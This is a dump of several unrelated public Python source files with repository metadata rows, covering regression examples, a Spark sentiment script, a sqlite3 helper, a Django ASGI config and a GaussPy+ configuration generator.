#an easier method to find the slope is as follows
import statsmodels.api as sm
mod = sm.OLS(y,x) #x are the predictor values
est = mod.fit()
print(est.summary())
X = sm.add_constant(x) #same as x but include colum of 1s
mod=sm.OLS(y,X)
est = mod.fit()
print(est.summary())
n = 500
beta_0 = 5
beta_1 = 2
beta_2 = -1
np.random.seed(1)
#generates random scatter of x1 and x2
x_1 = 10 * ss.uniform.rvs(size=n)
x_2 = 10 * ss.uniform.rvs(size=n)
#outcome
y = beta_0 + beta_1*x_1 + beta_2*x_2 + ss.norm.rvs(loc=0, scale=1, size=n)
#take x1 and x2 and stack as columns in a matrix
X = np.stack([x_1, x_2], axis=1)
from mpl_toolkits.mplot3d import Axes3D
fig=plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(X[:,0], X[:,1], y, c=y)
from sklearn.linear_model import LinearRegression
lm = LinearRegression(fit_intercept=True)
lm.fit(X,y)
print(f"intercept: {lm.intercept_}")
print(f"coefficients [x1,x2]: {lm.coef_}")
#predict value of outcome for some X
X_0 = np.array([2,4]) #take x1=2, x2=4
lm.predict(X_0.reshape(1, -1))
lm.score(X, y) #finds R2, takes input X, generates prediction of y, compares outcome with actual y
#ASSESSING MODEL ACCURACCY
#Mean squared error (MSE) is most common way to assess accuraccy
#how to split data to training and test
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=0.5, random_state=1)
lm = LinearRegression(fit_intercept=True) #creates a model object
lm.fit(X_train, y_train) #fits training data
wlm.score(X_test, y_test) #takes input X data (test), then compares outputs to test Ys
| [
"julian.malisano@gmail.com"
] | julian.malisano@gmail.com |
a88bef576b03596e2e500519c246aa0f8c42b851 | 36eed51b5a456e3f239ff47a7f29a24b3fc2602e | /gmuwork/stamp/MASS_algorithm_testing.py | 23849969cbd53a04c9387adc65e3175076520bc0 | [] | no_license | rajivsarvepalli/Python-Projects | ad4b07563a647837146b877475606ceff2e2e2ed | 9655e64e10928598c821db0852275ba9712f9371 | refs/heads/master | 2023-01-29T14:27:09.777044 | 2020-12-13T02:13:15 | 2020-12-13T02:13:15 | 98,135,265 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,853 | py | import numpy as np
import matplotlib.pyplot as plt
from gmuwork.shortcuts import quick_txt_reader
from scipy.spatial import distance
import time
from gmuwork.shortcuts import quick_txt_reader
from MASS_algorithm_development import STAMP
from multiprocessing import Pool,freeze_support
from itertools import repeat
import matplotlib.pyplot as plt
def fft_time(X):
    """Time one inverse FFT of ``X`` and print the elapsed seconds.

    The input is transformed once up front so that only ``np.fft.ifft`` is
    inside the timed window.

    Fix: removed the dead in-function ``from scipy.fftpack import fft,ifft``
    -- the original imported it but only ever used numpy's FFT.
    """
    X = np.fft.fft(X)
    start = time.time()
    np.fft.ifft(X)
    print(time.time() - start)
if __name__=="__main__":
import scipy.io as sio
from gmuwork.shortcuts import quick_txt_reader
matfile = sio.loadmat("C:/Users/Rajiv Sarvepalli/Downloads/testData.mat")
data = matfile['data'][0]
# for x in range(0,142):
# data+=[2,2,2,2,2,5,5,5,5,5,6,6,6,6,6,6,8,8,8,8,8,9,9,9,9,9,8,8,8,8,8,6,6,6,6,6,5,5,5,5,5,2,2,2,2,2]
# data = np.insert(data,2500,[10,11,12,13,14,15,16,17,
# 18,19,20,21,22,23,24,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10])
# data = np.insert(data,1000,[10,10,10,10,10])
# data = np.insert(data,4500,[10,11,11,11,11,11,11,11,11,11,10])
AtoA = np.load("C:/Users/Rajiv Sarvepalli/Projects/Data for GMU/tests/AtoA.txt.npy")
AtoM = np.load("C:/Users/Rajiv Sarvepalli/Projects/Data for GMU/tests/AtoM.txt.npy")
print(np.max(AtoA))
print('loc: ',np.argmax(AtoA))
print(np.max(AtoM))
print('loc: ',np.argmax(AtoM))
testDataStamp = np.load("C:/Users/Rajiv Sarvepalli/Projects/Data for GMU/tests/testDataStamp.npy")
testdataMAtrixprolfile = testDataStamp[0]
print(len(testdataMAtrixprolfile))
times = [x for x in range(0,len(data))]
plt.figure(figsize=(30,5))
plt.plot(times,data,c='r')
times = [x for x in range(0,len(testdataMAtrixprolfile))]
plt.figure(figsize=(30,5))
plt.plot(times,testdataMAtrixprolfile,c='b')
plt.show()
| [
"rajiv@ericavijay.net"
] | rajiv@ericavijay.net |
2ee77e9b6aabad5c58fa02cfc6ef96cf487ee72e | 978f28b5845599e6682d578246b20129a77df2c4 | /Arrays/Swap Minimum.py | 936260b72d2a83aa8bc412649ee6df0e497bbe7d | [] | no_license | mdrijwan123/Python-Programs | bfa48e35c1a4172bb5ed2cbb604497693b8d79ca | dae67e7f83fc786a33933c0cb7315246dbef9432 | refs/heads/master | 2021-07-08T03:29:08.319918 | 2021-04-18T07:58:55 | 2021-04-18T07:58:55 | 240,065,567 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,147 | py | # Python3 program to find the minimum number
# of swaps required to sort an array
# of distinct element
# Function to find minimum swaps to
# sort an array
def findMinSwap(arr, n):
    """Return the minimum number of swaps needed to sort ``arr`` (``n``
    distinct elements) into ascending order.

    Fixes the original implementation: its chained pair-swap assignments
    corrupted the bookkeeping list, and its ``i -= 1`` inside a ``for`` loop
    was a no-op in Python (the loop variable is reassigned on the next
    iteration), so the reported count was wrong.  This version uses the
    standard cycle-decomposition argument: a permutation cycle of length L
    needs exactly L - 1 swaps.
    """
    # order[k] = index in arr of the element that belongs in sorted slot k.
    order = sorted(range(n), key=lambda k: arr[k])
    visited = [False] * n
    swaps = 0
    for start in range(n):
        # Skip slots already in place or already counted as part of a cycle.
        if visited[start] or order[start] == start:
            continue
        cycle_len = 0
        j = start
        while not visited[j]:
            visited[j] = True
            j = order[j]
            cycle_len += 1
        swaps += cycle_len - 1
    return swaps
# Driver code
arr = [1, 5, 4, 3, 2]
arr2 = [5, 4, 3, 2, 1]  # NOTE(review): defined but never passed to findMinSwap
n = len(arr)
print(findMinSwap(arr, n))
# This code is contributed by mohit kumar 29
| [
"Mohammad.Rijwan@ril.com"
] | Mohammad.Rijwan@ril.com |
243d9867b8061153fc7a04ba2758583b186e5005 | bfc15a15ea7b8c201479205e0a3dd2cbd3385e1f | /Dataframe/application-6.py | fc64d5dc4f10ff8ee07561a25fe22d1d2675b2ad | [] | no_license | RahulBantode/Pandas_python | b3be5ccecce07f3073d469eb42614b83083cd144 | b5115cc40039e79d263d29a5822506a2da0869a8 | refs/heads/main | 2023-05-31T16:25:39.883123 | 2021-06-14T06:06:05 | 2021-06-14T06:06:05 | 364,258,067 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,205 | py | # Write a program to convert the list of nested dictonary into pandas dataframe
import pandas as pd
def main():
    """Flatten a list of nested student dictionaries into a pandas DataFrame.

    Each input record holds a list of per-exam dicts under ``"Student"`` and
    the student's name under ``"Name"``; every exam dict is tagged with that
    name and collected into one flat table, which is printed.
    """
    data = [
        {
            "Student": [{"Exam": 90, "Grade": "A"},
                        {"Exam": 99, "Grade": "O"},
                        {"Exam": 59, "Grade": "C"}],
            "Name": "Nitin Chaudhary"
        },
        {
            "Student": [{"Exam": 80, "Grade": "A"},
                        {"Exam": 70, "Grade": "B"},
                        {"Exam": 59, "Grade": "C"}],
            "Name": "Kunal Chinchole"
        },
        {
            "Student": [{"Exam": 90, "Grade": "A"},
                        {"Exam": 40, "Grade": "D"},
                        {"Exam": 30, "Grade": "D-"}],
            "Name": "Mohit Sharma"
        }
    ]

    # Echo the raw records, one per line (same output as the original
    # index-based loop).
    for record in data:
        print(record)

    # Flatten: tag each per-exam dict with its student's name.  This mutates
    # the nested dicts in place, exactly like the original implementation.
    rows = []
    for record in data:
        student_name = record["Name"]
        for exam_row in record["Student"]:
            exam_row["Name"] = student_name
            rows.append(exam_row)

    df = pd.DataFrame(rows)
    print(df)
if __name__ == '__main__':
    # Run the demo only when executed as a script, not when imported.
    main()
"noreply@github.com"
] | RahulBantode.noreply@github.com |
302e4f5d54775811ffb4a5eaa0bf7f0d067c4f6e | c8b9750ceca3a7577a5f7ed92635fa64dc4c8a3b | /ML/dat/fake/step_3_create_data_stats.py | 98c569c128ec70f08a37f8ff68c53e0514e3cc6e | [] | no_license | MaazAmjad/fakenews-1 | 98ce7fd468d132f04e72b0697445a186e0cda9cd | f0dc42e188ccbbbdf01b0462de9c5564e9e222bc | refs/heads/master | 2020-04-10T06:28:16.082434 | 2017-06-25T17:56:46 | 2017-06-25T17:56:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 626 | py | import glob
import os
import numpy as np
import pickle
dataset_name = 'fake'
# Change this to a list of the time slices
files = glob.glob('train/*.npy')
dat_stats={}
dat_stats['name'] = dataset_name
dat_stats['T_bins'] = ['all']
dat_stats['prefix'] = 0
T = len(dat_stats['T_bins'])
def count_words(split):
    # Accumulate, per time bin, the number of rows found in this split's
    # .npy files (despite the name it counts examples, not words).  Results
    # are written into the module-level ``dat_stats`` dict under ``split``.
    dat_stats[split] = np.zeros(T)
    for t, i in enumerate(dat_stats['T_bins']):
        if split=='train':
            print(i)
        for fname in files:
            dat = np.load(fname)
            dat_stats[split][t] += len(dat)
count_words('train')
pickle.dump(dat_stats, open('dat_stats.pkl', "w" ) )
| [
"marirudolph@gmail.com"
] | marirudolph@gmail.com |
96ca6a2aa20fc70c52aeb01a51a7601fdc92df16 | 96a869cb1ebef0ce0f17b2f4003dc47b712023a2 | /tests/test_encoder.py | 803649b511d1ed96bc398dab95723bb4b93dc47f | [
"MIT"
] | permissive | lincheney/journald-2-cloudwatch | c7b256b9365cddef5bf6193beb72d41a690413b3 | 54ca0785ffe55565a4af853c6c2d10f974c52e6b | refs/heads/master | 2021-07-07T11:28:50.039557 | 2021-05-08T13:11:21 | 2021-05-08T13:11:21 | 54,527,621 | 5 | 10 | MIT | 2021-05-08T08:24:12 | 2016-03-23T03:21:08 | Python | UTF-8 | Python | false | false | 1,036 | py | from unittest import TestCase
import datetime
import uuid
import json
import main
class JsonEncodeTest(TestCase):
    """Unit tests for main.JournalMsgEncoder's JSON serialization rules."""

    def dumps(self, value):
        # Serialize through the custom encoder under test.
        return json.dumps(value, cls=main.JournalMsgEncoder)

    def test_encode_default(self):
        ''' test encoding is same as defaults '''
        # Plain JSON-native values must round-trip identically to json.dumps,
        # and unencodable objects must still raise TypeError.
        for obj in [
            "string",
            123,
            123.45,
            [1, 2, 'x'],
            dict(key='value'),
            [1, dict(key=dict(nested=[])), ['a', 'b', 'c']],
        ]:
            self.assertEqual(self.dumps(obj), json.dumps(obj))
        self.assertRaises(TypeError, self.dumps, object())
        self.assertRaises(TypeError, self.dumps, {'dict': object()})

    def test_encode_datetime(self):
        ''' test encoding datetime '''
        # Datetimes are encoded as their POSIX timestamp (a float).
        obj = datetime.datetime.now()
        self.assertEqual(self.dumps(obj), json.dumps(obj.timestamp()))

    def test_encode_uuid(self):
        ''' test encoding uuids '''
        # UUIDs are encoded as their canonical string form.
        obj = uuid.uuid4()
        self.assertEqual(self.dumps(obj), json.dumps(str(obj)))
| [
"lincheney@gmail.com"
] | lincheney@gmail.com |
68844fda6183aab0481569bfa8e808c884a38b0c | f0205344df67e01f6c848456d8696332e352b2c5 | /opencv_webapp/opencv_webapp/asgi.py | 1d3f1f3192e12af8e55145399335a54711b6bdc2 | [] | no_license | Mactto/OpenCV_Webapp | 4ec729009011db2519d4b051b665acc60bd7018f | 341e214f46ad414161a40e20f7f98965398cec6a | refs/heads/master | 2023-03-17T11:44:23.420036 | 2021-02-27T17:14:05 | 2021-02-27T17:14:05 | 341,464,801 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 402 | py | """
ASGI config for opencv_webapp project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
# Point Django at this project's settings before the app object is built.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'opencv_webapp.settings')

# Module-level ASGI callable that servers (uvicorn/daphne) import.
application = get_asgi_application()
| [
"shc9928@gmail.com"
] | shc9928@gmail.com |
816bc1f2b26ff3327eaf800a4aa881e8d8d25c92 | ff428bee2cbace63c48cd9681fe072043a2b1ef0 | /06_Yelp_Sentiment_Analysis/pos_neg.py | 2cf012f8ab0ec790ff43ef6f18b265695527d8fa | [] | no_license | theoliao1998/Data-Manipulation-and-Analysis | e3f139e3cbc1217027fdd2b143cc9140061db8f5 | 64cd0379871dae7e3680e91e575af6ef3e0f227e | refs/heads/master | 2020-08-04T18:53:21.273123 | 2019-12-10T03:20:05 | 2019-12-10T03:20:05 | 212,243,627 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,420 | py | #pyspark --master yarn --num-executors 35 --executor-memory 5g --executor-cores 4 --conf spark.ui.port="$(shuf -i 10000-60000 -n 1)"
import json
import math
import re
from pyspark import SparkConf, SparkContext
from pyspark.sql import SQLContext
conf = SparkConf().setAppName("si618_lec6")
sc = SparkContext(conf=conf)
sqlContext = SQLContext(sc)
input_file = sc.textFile("hdfs:///var/umsi618/hw5/review.json")
inputs = input_file.map(lambda line: json.loads(line))
WORD_RE=re.compile(r"\b[\w]+\b")
def convert_dict_to_tuples(d):
    """Tokenize one review dict into (star_rating, word) pairs.

    The review's text is lower-cased and split with the module-level
    WORD_RE tokenizer; one tuple is emitted per token so the result can
    be flatMap'ed into an RDD of (rating, word) pairs.
    """
    stars = d['stars']
    words = WORD_RE.findall(d['text'].lower())
    return [(stars, w) for w in words]
# Flatten every review into (rating, word) pairs.
rating_word = inputs.flatMap(convert_dict_to_tuples)
# Total occurrence count of each word over the whole corpus.
all_count = rating_word.map(lambda x: (x[1],1)) \
    .reduceByKey(lambda x, y: (x + y))
# Words from reviews rated >= 5 stars.
pos_word = rating_word.filter(lambda x: x[0]>=5)
pos_count = pos_word.map(lambda x: (x[1],1)) \
    .reduceByKey(lambda x, y: (x + y))
"""
[(u'halligan', 2), (u'kickasss', 2), (u'divinely', 95), (u'hasnbeen', 1), (u'oec', 1),
(u'four', 36404), (u'prices', 179031), (u'conjuring', 15), (u'sentaron', 1), (u'otro', 155)]
"""
# Words from reviews rated <= 2 stars.
neg_word = rating_word.filter(lambda x: x[0]<=2)
neg_count = neg_word.map(lambda x: (x[1],1)) \
    .reduceByKey(lambda x, y: (x + y))
"""
[(u'rasamalai', 4), (u'potillos', 1), (u'063016', 1), (u'varierty', 1), (u'four', 36260),
(u'prices', 73835), (u'conjuring', 18), (u'sevens', 96), (u'profil', 1), (u'amminities', 1)]
"""
# Token totals for the whole corpus and each subset (values seen in one run).
all_review_count = all_count.map(lambda x: x[1]).sum() #762235885
pos_review_count = pos_count.map(lambda x: x[1]).sum() #263994836
neg_review_count = neg_count.map(lambda x: x[1]).sum() #225489788
# Restrict scoring to words that appear more than 1000 times overall.
freq_words = all_count.filter(lambda x: x[1]>1000).cache()
step_3pos = freq_words.join(pos_count)
step_3neg = freq_words.join(neg_count)
# Log ratio of a word's frequency in positive reviews vs. the whole corpus.
positivity = step_3pos.map(lambda x:(x[0], math.log(float(x[1][1])/pos_review_count) \
    - math.log(float(x[1][0])/all_review_count)))
sorted_pos = positivity.sortBy(lambda x:x[1], ascending = False)
sorted_pos.saveAsTextFile('si618_hw6_theoliao_posreview.csv')
# Same log ratio for negative reviews.
negativity = step_3neg.map(lambda x:(x[0], math.log(float(x[1][1])/neg_review_count) \
    - math.log(float(x[1][0])/all_review_count)))
sorted_neg = negativity.sortBy(lambda x:x[1], ascending = False)
sorted_neg.saveAsTextFile('si618_hw6_theoliao_negreview.csv')
| [
"theoliao1998@gmail.com"
] | theoliao1998@gmail.com |
1cbe7bc5b397893e2a6ed6ca7e72b9c502181a5f | 7fb01b504bfbb5bb57a298f9bfe67a5a04fb61f6 | /Layers/struct_edge_decoder_layer.py | 2fbeb6d106d73af8e851f7fb6ba6a15395781448 | [
"BSD-3-Clause"
] | permissive | feiliu01/struct_infused_summ | 8484a20ecddcd7b0f3dc974593b5f178e299fa0a | 330ae816cf3dc7708b7ee7c24d921f9f5f459e25 | refs/heads/master | 2020-03-19T00:47:31.522014 | 2018-05-30T21:51:56 | 2018-05-30T21:51:56 | 135,502,005 | 1 | 0 | null | 2018-05-30T22:03:08 | 2018-05-30T22:03:08 | null | UTF-8 | Python | false | false | 4,754 | py | import theano
import theano.tensor as T
import numpy as np
from utility.utility import *
from lstm_layer import *
from feedforward_layer import *
from attention_layer import *
from indexing_layer import *
'''
LayerName : attention_stanford_decoder_layer
Math:
h_d_t = LSTM(h_d_(t-1), y_(t-1))
e_t_i = f_att(h_d_t, h_e_i)
alpha_t = softmax(e_t_i)
context_t = alpha_t * e_t
h_d2_t = tanh(W[h_d_t, context_t])
Or h_d2_t = LSTM(h_d2_(t-1), [h_d_t, context_t])
dist = softmax(W * h_d2_t)
Parameters:
n_emb: dimension of y_(t-1)
n_att: dimension of attention layer
n_h1: dimension of h_d_t
n_h2: dimension of h_d2_t
n_he: dimension of h_e_i
'''
def struct_edge_decoder_init(prefix, params, layer_setting):
    """Register every parameter of the structure-infused edge decoder.

    Sub-layers (decoder LSTM, two attention heads, indexing layer and the
    tanh/softmax/switcher feed-forward layers) each add their own weights
    to `params` under `prefix`-derived names; the updated dict is returned.
    """
    attention_parts = (
        ('_lstm', lstm_init),
        ('_att_1', attention_init),
        ('_att_2', attention_init),
    )
    for suffix, init_fn in attention_parts:
        params = init_fn(prefix + suffix, params, layer_setting[suffix])
    # The indexing layer receives the whole layer_setting dict (no sub-key).
    params = indexing_init(prefix + 'parent', params, layer_setting)
    # Scalar weight that mixes the structural bias into the attention
    # (see its use in struct_edge_decoder_calc).
    params[join(prefix, 'epsilon')] = numpy_floatX(0.5)
    for suffix in ('_tanh', '_softmax', '_switcher'):
        params = feedforward_init(prefix + suffix, params, layer_setting[suffix])
    return params
def struct_edge_decoder_calc(prefix, params, layer_setting, h_e, s_e, parent, mask_below, state_below, h_init = None, c_init = None, mask = None, training = True):
    """Single decoder pass with structure-infused attention (theano graph).

    Runs the decoder LSTM, computes content attention `alpha` over encoder
    states `h_e` and structural attention `beta` over `s_e`, derives a
    structural bias `gamma` from the `parent` indices, mixes it into the
    attention with the learned 'epsilon' parameter, and produces the output
    distribution `dist` plus a `switcher` signal.

    Shape legend (per the inline comments): T_D = decoder steps,
    N = batch size, T_E = encoder steps.

    Returns (h_d, c_d, dist, alpha, beta, gamma, delta, switcher).
    """
    [h_d, c_d] = lstm_calc(prefix+'_lstm', params, layer_setting['_lstm'], state_below, h_init, c_init, mask, training = training)
    alpha = attention_calc(prefix+'_att_1', params, layer_setting['_att_1'], h_d, h_e)
    beta = attention_calc(prefix+'_att_2', params, layer_setting['_att_2'], h_d, s_e)
    #alpha : T_D, N, T_E
    #beta : T_D, N, T_E
    # Exclusive cumulative sum of alpha along decoder time (coverage so far).
    alpha2 = T.concatenate([T.zeros_like(alpha[:1], dtype = 'float32'),T.cumsum(alpha, axis = 0)], axis = 0)[:-1]
    #alpha2 : T_D, N, T_E
    # 0-based position of each encoder token; masked-out slots become -1.
    position = T.cumsum(T.ones_like(mask_below, dtype = 'int64') * mask_below, axis = 0) - 1
    #position : T_E, N
    cond_1 = (position < parent)
    #cond_1 = (T.neq(position, -T.ones_like(position)))
    #cond_1: T_E, N
    cond_2 = (parent < position) & (T.neq(position, -T.ones_like(position)))
    #cond_2 = (T.neq(position, -T.ones_like(position)))
    #cond_2: T_E, N
    cond_1_ = T.tile(cond_1, (alpha.shape[0], 1, 1)).dimshuffle(0,2,1)
    #cond_1_ : T_D, N, T_E
    cond_2_ = T.tile(cond_2, (alpha.shape[0], 1, 1)).dimshuffle(0,2,1)
    #cond_2_ : T_D, N, T_E
    # Coverage gathered at each token's parent index.
    alpha2_p = indexing_calc(prefix+'parent', params, alpha2.dimshuffle(2,1,0), parent).dimshuffle(2,1,0)
    #alpha2_p : T_D, N, T_E
    item_1 = beta * alpha2
    #item_1 : T_D, N, T_E
    item_2 = beta * alpha2_p
    #item_2 : T_D, N, T_E
    # Scatter targets: a token's parent when the parent lies ahead, else -1.
    target = T.where(cond_1, parent, -T.ones_like(parent, dtype = 'int64'))
    #target: T_E, N
    target = T.tile(target, (alpha.shape[0], 1, 1)).dimshuffle(0,2,1)
    #target: T_D, N, T_E
    gamma = T.where(cond_2_, item_2, T.zeros_like(item_2, dtype = 'float32'))
    #gamma: T_D, N, T_E
    # Shift targets by one so index 0 can absorb the "no target" (-1) entries.
    target_plus = T.concatenate([T.zeros_like(target[:,:,:1], dtype = 'int64'), target+1], axis = 2)
    #target_plus: T_D, N, T_E + 1
    item_1_plus = T.concatenate([T.zeros_like(item_1[:,:,:1], dtype = 'float32'), item_1], axis = 2)
    #target_plus: T_D, N, T_E + 1
    target_flat = target_plus.flatten()
    #target_plus: T_D * N * (T_E + 1)
    item_1_flat = item_1_plus.flatten()
    #item_1_flat: T_D * N * (T_E + 1)
    t_d, n_sample, t_e = item_1_plus.shape
    # Scatter-add item_1 onto its target positions via a one-hot matrix M.
    M = T.zeros((t_d * n_sample * t_e, t_e), dtype = 'float32')
    d_flat = T.arange(t_d * n_sample * t_e, dtype = 'int64')
    #M[d_flat,target_flat = item_1_flat
    M = T.set_subtensor(M[(d_flat, target_flat)], item_1_flat)
    M = T.reshape(M, (t_d, n_sample, t_e, t_e), ndim = 4)
    #M = M.dimshuffle(0,3,1,2)
    gamma += T.sum(M, axis = 2)[:,:,1:]
    # Mix the structural bias into the content attention and renormalise.
    delta = alpha + params[join(prefix,'epsilon')] * gamma
    delta = delta / T.sum(delta, axis = 2, keepdims=True)
    context = T.batched_dot(delta.dimshuffle(1,0,2), h_e.dimshuffle(1,0,2)).dimshuffle(1,0,2)
    h_d_2 = feedforward_calc(prefix+'_tanh', params, layer_setting['_tanh'], T.concatenate([h_d, context], axis = 2))
    dist = feedforward_calc(prefix+'_softmax', params, layer_setting['_softmax'], h_d_2)
    # NOTE(review): presumably a copy/generate gate — confirm with callers.
    switcher = feedforward_calc(prefix+'_switcher', params, layer_setting['_switcher'], T.concatenate([h_d, context, state_below], axis = 2))
    return h_d, c_d, dist, alpha, beta, gamma, delta, switcher
| [
"kqsong2014@gmail.com"
] | kqsong2014@gmail.com |
4f5adbe134e4234f219d36ceb9f338e77805f34d | 6b77ae897567d391780efa7457368301077e2330 | /untitled5/aqllie3.py | 15b5b4e41368ad2d69808be0dd151b70bebe7041 | [] | no_license | wapjin/python-code | 03ba079ebc551941c3d0d1122db5fb944070e397 | d82f7e64b6c62bf8eb04f960c8fa03b02495b2fc | refs/heads/master | 2020-12-13T17:59:25.265569 | 2020-03-21T08:12:16 | 2020-03-21T08:12:16 | 234,477,075 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,333 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019-11-11 8:55
# @Author : liujin
# @Email : 1045833538@QQ.com
# @File : aqllie3.py
import sqlite3
# Module-level connection shared by every helper below.
conn = sqlite3.connect('test.db')
def sql_colose():
    # Commit pending changes and close the shared connection.
    # NOTE(review): name looks like a typo for "sql_close"; kept for callers.
    conn.commit()
    conn.close()
def sql_lite():
    # Return a fresh cursor on the shared module-level connection.
    return conn.cursor()
# Create the `user` table
def new_table():
    cursor = sql_lite()
    cursor.execute('create table user (id INTEGER PRIMARY KEY AUTOINCREMENT, name varchar(20))')
    cursor.close()
# Drop the `user` table
def del_table():
    cursor = sql_lite()
    cursor.execute('DROP TABLE user;')
    cursor.close()
# Insert a row
def add_td(value):
    """Insert one row with the given name and print the affected row count."""
    cursor = sql_lite()
    # Use a bound parameter instead of string concatenation: the original
    # 'values ("' + value + '")' was open to SQL injection and broke on
    # names containing double quotes.
    cursor.execute('insert into user (name) values (?)', (value,))
    print(cursor.rowcount)
    cursor.close()
# Query and print all rows
def get_table():
    cursor = sql_lite()
    cursor.execute('select * from user')
    values = cursor.fetchall()
    print(values)
    cursor.close()
# Delete rows whose name matches LIKE '%<id>'
def del_td(id):
    """Delete rows whose name ends with `id` (suffix LIKE match).

    `id` keeps its historical (builtin-shadowing) name for compatibility.
    """
    cursor = sql_lite()
    # Bound parameter instead of string concatenation (SQL-injection fix);
    # the pattern keeps the original leading-% suffix match.
    cursor.execute('DELETE FROM user WHERE name like ?;', ('%' + str(id),))
    cursor.close()
# Update: execute a caller-supplied SQL statement
def up_td(sql_value):
    # WARNING: runs arbitrary SQL passed by the caller; never feed it
    # untrusted input.
    cursor = sql_lite()
    cursor.execute(sql_value)
    cursor.close()
# Demo driver; earlier experiments are left commented out.
# add_td("meinv")
# del_td("xiaozhuang")
# new_table()
get_table()
up_td('UPDATE user SET name = "jin" WHERE id = 3;')
get_table()
# del_table()
sql_colose()
"1045833538@qq.com"
] | 1045833538@qq.com |
d115e9cbc8f86f38f8bbf1f21c6949e209b82664 | 9bc72b4fcfd71154e41057ce5b149d6a9f657661 | /decision_tree/decision_tree_iris.py | 48b6345d73fb70f4c268d57ca3dc16c172102db8 | [] | no_license | ChenKangQiang/scikit_learn_test | 2f0cc875da64133d2e382bc0d8f5995d939a38d9 | 3ed52d950c7e5d9ebd18e2f8b2683223a38ea7ca | refs/heads/master | 2020-03-12T10:23:02.795612 | 2018-04-22T13:51:56 | 2018-04-22T13:51:56 | 130,571,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 347 | py | from sklearn.datasets import load_iris
from sklearn import tree
import pydotplus
# Iris Iris也称鸢尾花卉数据集
iris = load_iris()
clf = tree.DecisionTreeClassifier()
clf = clf.fit(iris.data, iris.target)
dot_data = tree.export_graphviz(clf, out_file=None)
graph = pydotplus.graph_from_dot_data(dot_data)
graph.write_pdf("iris.pdf")
| [
"ckq123@outlook.com"
] | ckq123@outlook.com |
be5b913111b7671ed74f5a4a6124902cba8e3f12 | f4fb0d1c80638440b56e21262f603d3d1f177dd0 | /gausspyplus/config_file.py | 77e79a07e1cac20c3fa5c5c9a440a85eed0d001b | [] | no_license | Deech08/gausspyplus | 7915d3927f6b2a1132cfab2a94e8d3f4d48f9f33 | 0ea7f91321f648e70984ca6b3f1532ef6b6b53fd | refs/heads/master | 2020-06-23T14:54:21.135261 | 2019-06-26T09:20:46 | 2019-06-26T09:20:46 | 198,655,468 | 1 | 0 | null | 2019-07-24T14:48:45 | 2019-07-24T14:48:44 | null | UTF-8 | Python | false | false | 19,065 | py | # @Author: riener
# @Date: 2019-03-03T20:27:37+01:00
# @Filename: config_file.py
# @Last modified by: riener
# @Last modified time: 2019-04-08T10:08:05+02:00
import ast
import configparser
import collections
import os
from astropy import units as u
from .utils.output import save_file
def append_keywords(config_file, dct, all_keywords=False, description=True):
for key in dct.keys():
if all_keywords:
if description:
config_file.append(
'\n\n# {}'.format(dct[key]['description']))
config_file.append('\n{} = {}'.format(key, dct[key]['default']))
else:
if dct[key]['simple']:
if description:
config_file.append(
'\n\n# {}'.format(dct[key]['description']))
config_file.append('\n{} = {}'.format(key, dct[key]['default']))
return config_file
def make(all_keywords=False, description=True, output_directory='',
filename='gausspy+.ini'):
"""Create a GaussPy+ configuration file.
Parameters
----------
all_keywords : bool
Default is `False`, which includes only the most essential parameters. If set to `True`, include all parameters in the configuration file.
description : bool
Default is `True`, which includes descriptions of the parameters in the configuration file.
output_directory : string
Directory to which configuration file gets saved.
filename : string
Name of the configuration file.
Returns
-------
type
Description of returned object.
"""
config_file = str('# Configuration file for GaussPy+\n\n')
default = [
('log_output', {
'default': 'True',
'description': "log messages printed to the terminal in 'gpy_log' directory [True/False]",
'simple': False}),
('verbose', {
'default': 'True',
'description': "print messages to the terminal [True/False]",
'simple': False}),
('overwrite', {
'default': 'True',
'description': "overwrite files [True/False]",
'simple': False}),
('suffix', {
'default': '""',
'description': "suffix added to filename [str]",
'simple': False}),
('use_ncpus', {
'default': 'None',
'description': "number of CPUs used in parallel processing. By default 75% of all CPUs on the machine are used. [int]",
'simple': True}),
('snr', {
'default': '3.',
'description': "Required minimum signal-to-noise ratio for data peak. [float]",
'simple': True}),
('significance', {
'default': '5.',
'description': "Required minimum value for significance criterion. [float]",
'simple': True}),
('snr_noise_spike', {
'default': '5.',
'description': "Required signal-to-noise ratio for negative data values to be counted as noise spikes. [float]",
'simple': False}),
('min_fwhm', {
'default': '1.',
'description': "Required minimum value for FWHM values of fitted Gaussian components specified in fractions of channels. [float]",
'simple': False}),
('max_fwhm', {
'default': 'None',
'description': "Enforced maximum value for FWHM parameter specified in fractions of channels. Use with caution! Can lead to artifacts in the fitting. [float]",
'simple': False}),
('separation_factor', {
'default': '0.8493218',
'description': "The required minimum separation between two Gaussian components (mean1, fwhm1) and (mean2, fwhm2) is determined as separation_factor * min(fwhm1, fwhm2). [float]",
'simple': False}),
('fwhm_factor', {
'default': '2.',
'description': "factor by which the FWHM value of a fit component has to exceed all other (neighboring) fit components to get flagged [float]",
'simple': False}),
('min_pvalue', {
'default': '0.01',
'description': "p-value for the null hypothesis that the normalised residual resembles a normal distribution. [float]",
'simple': False}),
('two_phase_decomposition', {
'default': 'True',
'description': "Whether to use one or two smoothing parameters for the decomposition. [True/False]",
'simple': False}),
('refit_blended', {
'default': 'True',
'description': "Refit blended components. [True/False]",
'simple': True}),
('refit_broad', {
'default': 'True',
'description': "Refit broad components. [True/False]",
'simple': True}),
('refit_neg_res_peak', {
'default': 'True',
'description': "Refit negative residual features. [True/False]",
'simple': True}),
('refit_rchi2', {
'default': 'False',
'description': "Refit spectra with high reduced chi-square value. [True/False]",
'simple': False}),
('refit_residual', {
'default': 'True',
'description': "Refit spectra with non-Gaussian distributed residuals. [True/False]",
'simple': True}),
('refit_ncomps', {
'default': 'True',
